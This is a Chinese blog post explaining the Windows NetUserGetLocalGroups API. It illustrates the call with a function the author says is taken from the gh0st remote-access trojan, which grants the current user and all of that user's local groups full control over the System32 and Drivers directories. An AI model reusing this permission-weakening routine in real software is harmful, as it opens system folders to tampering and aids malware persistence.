NetUserGetLocalGroups提取特定用户的本地组

最新推荐文章于 2022-05-04 23:36:46 发布

poppy飞翔

最新推荐文章于 2022-05-04 23:36:46 发布

阅读量1.6k

点赞数

分类专栏： windows核心编程 API

本文链接：https://blog.csdn.net/qq_22423659/article/details/53924602

版权

windows核心编程同时被 2 个专栏收录

38 篇文章

订阅专栏

API

8 篇文章

订阅专栏

NetUserGetLocalGroups函数用于获取指定用户属于的本地组列表。成功返回NERR_Success，失败则可能返回各种错误代码。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

The NetUserGetLocalGroups function retrieves a list of local groups to which a specified user belongs.

也就是获取一组特定用户所属的本地组

NET_API_STATUS NetUserGetLocalGroups(
  _In_  LPCWSTR servername,    //指向DNS或者网络基本输入的指针；若为NULL，the local computer is used.
  _In_  LPCWSTR username,   //指针常量字符串，返回本地组成员信息，如果DomainName\UserName在domain中，那么
                           //用户名将会在服务器名指定的服务器上得到
 _In_  DWORD   level,   //为0
  _In_  DWORD   flags,  //影响标志位的操作，Currently, only the value defined is LG_INCLUDE_INDIRECT
  _Out_ LPBYTE  *bufptr,   //存储数据的缓冲区
                           //This buffer is allocated by the system and must be freed using the NetApiBufferFree function
  _In_  DWORD   prefmaxlen,  //首选的最大长度，若为MAX_PREFERRED_LENGTH，则根据所需的长度自动分配长度
  _Out_ LPDWORD entriesread, //获得的元素枚举的数量
  _Out_ LPDWORD totalentries  //所接受的条目总数，包含枚举
);

Return value

If the function succeeds, the return value is NERR_Success.

If the function fails, the return value can be one of the following error codes.

Return code	Description
ERROR_ACCESS_DENIED	The user does not have access rights to the requested information. This error is also returned if the servername parameter has a trailing blank.
ERROR_INVALID_LEVEL	The system call level is not correct. This error is returned if the level parameter was not specified as 0.
ERROR_INVALID_PARAMETER	A parameter is incorrect. This error is returned if the flags parameter contains a value other than LG_INCLUDE_INDIRECT.
ERROR_MORE_DATA	More entries are available. Specify a large enough buffer to receive all entries.
ERROR_NOT_ENOUGH_MEMORY	Insufficient memory was available to complete the operation.
NERR_DCNotFound	The domain controller could not be found.
NERR_UserNotFound	The user could not be found. This error is returned if the username could not be found.
RPC_S_SERVER_UNAVAILABLE	The RPC server is unavailable. This error is returned if the servername parameter could not be found.

列举gh0st0上面的一个方法

    void SetAccessRights()  
    {  
        /* 
        先声明用户名，组名，驱动目录，系统目录。 
        */  
        char    lpUserName[50], lpGroupName[100], lpDriverDirectory[MAX_PATH], lpSysDirectory[MAX_PATH];  
        DWORD   nSize = sizeof(lpUserName);  
          
        LPLOCALGROUP_USERS_INFO_0 pBuf = NULL;     
        DWORD   dwEntriesRead = 0;     
        DWORD   dwTotalEntries = 0;     
        NET_API_STATUS   nStatus;  
        WCHAR wUserName[100];  
          
        /* 
        将内存块清零 
        */  
        ZeroMemory(lpUserName, sizeof(lpUserName));  
        ZeroMemory(lpDriverDirectory, sizeof(lpDriverDirectory));  
        ZeroMemory(lpSysDirectory, sizeof(lpSysDirectory));  
        /* 
        获取系统的目录；返回long类型 
        如果目录的大小大于size的值，那么返回需要的目录大小 
        小于的话，返回实际的大小。 
        */  
        GetSystemDirectory(lpSysDirectory, sizeof(lpSysDirectory));  
        GetSystemDirectory(lpDriverDirectory, sizeof(lpDriverDirectory));  
        lstrcat(lpDriverDirectory, "\\Drivers");  
        GetUserName(lpUserName, &nSize);//获取用户名，返回的nSize就是实际用户名的长度  
        // 设置成员权限，提升用户权限，然后设置成宽字符保存在wUserName中  
        AddAccessRights(lpSysDirectory, lpUserName, GENERIC_ALL);  
        AddAccessRights(lpDriverDirectory, lpUserName, GENERIC_ALL);  
        MultiByteToWideChar( CP_ACP, 0, lpUserName, -1, wUserName, sizeof(wUserName) / sizeof(wUserName[0]));   
          
        /* 
        提取用户的信息，查看MSDN 
        应用程序使用NetUserGetLocalGroups函数来检索本地用户所属的组的列表 
        当您使用 Microsoft Windows Server 2003 中，或在 Microsoft Windows XP 调用NetUserGetLocalGroups函数的应用程序时，该应用程序可能会泄漏内存。 
        应用程序使用NetUserGetLocalGroups函数来检索本地用户所属的组的列表。如果用户不属于任何本地组， NetUserGetLocalGroups函数不会释放所有已分配的内存空间。 
        */  
        nStatus = NetUserGetLocalGroups(NULL,     
            (LPCWSTR)wUserName,  
            0,     
            LG_INCLUDE_INDIRECT,     
            (LPBYTE   *) &pBuf,     
            MAX_PREFERRED_LENGTH,     
            &dwEntriesRead,     
            &dwTotalEntries);     
          
        if (nStatus == NERR_Success)   //If the function succeeds, the return value is NERR_Success.  
        {     
            LPLOCALGROUP_USERS_INFO_0 pTmpBuf;     
            DWORD i;     
              
            if ((pTmpBuf = pBuf) != NULL)  
            {     
                for (i = 0; i < dwEntriesRead; i++)     
                {   
                    if (pTmpBuf == NULL)       
                        break;  
                    WideCharToMultiByte(CP_OEMCP, 0, (LPCWSTR)pTmpBuf->lgrui0_name, -1, (LPSTR)lpGroupName, sizeof(lpGroupName), NULL, FALSE);  
                    // 设置组的权限v                                                                                                                                                                                                                                                                                                                                                                                                                                    
                    AddAccessRights(lpSysDirectory, lpGroupName, GENERIC_ALL);//设置Group的权限  
                    AddAccessRights(lpDriverDirectory, lpGroupName, GENERIC_ALL);     
                    pTmpBuf++;    
                }     
            }        
        }     
        if (pBuf != NULL)   //释放缓冲  
            NetApiBufferFree(pBuf);   
          
    }